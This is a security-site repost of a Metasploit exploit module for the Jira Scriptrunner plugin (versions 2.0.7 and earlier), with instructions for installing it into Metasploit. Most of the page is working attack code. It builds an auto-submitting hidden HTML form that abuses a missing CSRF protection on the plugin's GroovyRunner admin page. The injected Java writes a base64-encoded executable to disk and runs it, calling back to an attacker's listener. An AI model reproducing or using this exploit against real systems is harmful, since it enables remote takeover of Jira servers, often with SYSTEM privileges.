首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Jira Scriptrunner 2.0.7 <= CSRF/RCE Exploit
来源:http://bensheppard.net/jira-scriptrunner-2-0-7 作者:Sheppard 发布时间:2012-11-14  

#[Author] Ben 'highjack' Sheppard
#[Title] Jira Scriptrunner 2.0.7 <= CSRF/RCE
#[Twitter] @highjack_
#[Author Url] http://bensheppard.net/jira-scriptrunner-2-0-7/
#[Vendor Url] https://marketplace.atlassian.com/plugins/com.onresolve.jira.groovy.groovyrunner
#[Install] To use this copy it into  ~/.msf4/modules/exploits/windows/http/scriptrunner.rb


require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
 include Msf::Exploit::Remote::HttpServer::HTML
 include Msf::Exploit::EXE

 def initialize
 super(
  'Name' => 'Jira Scriptrunner 2.0.7 <= CSRF/RCE',
  'Description' => %q{This jira plugin does notuse the built in jira protections (websudo or csrf tokens)
     to protect the page from CSRF. This page is supposed to be used by admins to automate tasks,
    it will accept java code and by default in a windows environment jira will
    be run as system},
  'Author' => [ 'Ben \'highjack\' Sheppard'],
  'License' => MSF_LICENSE,
  'Version' => 'Revision: 1 ',
  'Platform' => [ 'win'],
  'Targets' =>
   [
    ['Windows',   { 'Arch' => ARCH_X86, 'Platform' => 'win'   }]
   ],
  'DefaultTarget' => 0
  )
  
 register_options(
                        [
    OptString.new('RHOST', [true, 'Remote host of jira box']),
                                OptPort.new('RPORT', [true, 'Remote port of jira box', 8080]),
    OptString.new('LHOST', [true, 'Multihandler host to listen on']),
    OptBool.new('IS_SSL', [true, 'Does the target use ssl?', false]),
    OptPort.new('LPORT', [true, 'Multihandler port to listen on',4444])
                        ], self.class)

 end

 def csrf(url)
  shell = Rex::Text.rand_text_alpha(rand(8)+3) + ".exe"
  opts                = {:arch => target.arch, :platform => target.platform}
  encodedPayload      = Rex::Text.encode_base64(generate_payload_exe(opts))
  
  payloadLength = encodedPayload.length
                chunkLength = 500
 
                stringBuffer = ""
                for i in (0..payloadLength / chunkLength)
                        if payloadLength < i+chunkLength
                                 position = payloadLength-i
                        else
                                position = chunkLength
                        end
                        stringBuffer = stringBuffer + "encodedPayload.append(\"" + encodedPayload[i*chunkLength,position] + "\");\n"
                end

  jiraPayload = %Q|
    import sun.misc.BASE64Decoder;
    import java.io.*;
                         Runtime rt = Runtime.getRuntime();
    try
    {
    
    StringBuffer encodedPayload = new StringBuffer();
    #{stringBuffer}
    String sEncodedPayload = new String(encodedPayload.toString());
    BASE64Decoder b64decoder = new BASE64Decoder();
    byte[] decodedPayload = b64decoder.decodeBuffer(sEncodedPayload);
    
    BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream("#{shell}"));
    output.write(decodedPayload);
    output.close(); 
    }
    catch (Exception e)
    {
    return(e);
    }
    try
    {
  |
  jiraPayload = jiraPayload + "rt.exec(\"#{shell}\");}catch (Exception e){return (e);}"
  html = %Q|
  <html>
  <head></head>
  <body>
  <form action='#{url}/secure/admin/groovy/GroovyRunner.jspa' method='POST' id='groovy'>
  <input type='hidden' name='scriptLanguage' value='Groovy' />
  <div style='display:none'>
  <textarea name='script'>#{jiraPayload}&lt;/textarea&gt;
  </div>
  <input type='hidden' name='Run&32;now' value='Run&32;now' />
  </form>
  <script>document.getElementById('groovy').submit();</script>
  </body>
  </html>
  |
  return html
 end
 
 def getUrl()
  rhost = datastore['RHOST']
  rport = datastore['RPORT']
  isSsl = datastore['IS_SSL']

  if isSsl == true
   url = 'https://'
  else
   url = 'http://'
  end
  url = url + rhost + ':' + rport
  return url
 end 
 def on_request_uri(cli, request)
  url = getUrl()
  print_status("\n#{self.name} handling response\n")
  send_response_html( cli, csrf(url), { 'Content-Type' => 'text/html' } )
  return
 end  
 
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Invision IP.Board 3.3.4 unseri
·HT Editor 2.0.20 Buffer Overfl
·Zoner Photo Studio v15 b3 Buff
·Java Applet JAX-WS Remote Code
·Huawei Quidway / Huawei CX600
·Smadav Anti Virus 9.1 Crash Po
·Novell Groupwise Internet Agen
·Zoner Photo Studio v15 Build 3
·Novell NetIQ Privileged User M
·Apache downloader patch auto E
·Novell NetIQ Privileged User M
·A-PDF All to MP3 Converter v.2
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved